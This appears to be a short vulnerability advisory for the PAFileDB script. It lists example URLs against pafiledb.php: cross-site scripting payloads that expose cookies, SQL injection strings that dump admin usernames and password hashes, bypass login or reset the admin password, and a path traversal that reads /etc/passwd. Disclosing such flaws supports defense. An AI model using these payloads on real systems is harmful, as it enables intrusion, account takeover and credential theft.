|
PAFileDB Multiple Input Validation Vulnerabilities
The following examples are available: http://www.example.com/pafiledb.php?action=viewall&start=20&sortby=name%22 %3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/pafiledb.php?action=category&id=1&filelist=%22%3E%3C script%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/pafiledb.php?action=category&id=1&pages=%22%3E %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/pafiledb.php?action=admin&login=do&formname=-99'%20UNION %20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9', %20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1= %3E%3E+Log+In+%3C%3C&action=admin&login=do http://www.example.com/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username, admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+ Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit http://www.example.com/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username, admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE% 201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1 =%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit http://www.example.com/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do& query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28% 20WHERE%201/* http://www.example.com/pafiledb.php?action=../../../../etc/passwd%00&login=do |
|
|
Privacy Statement |
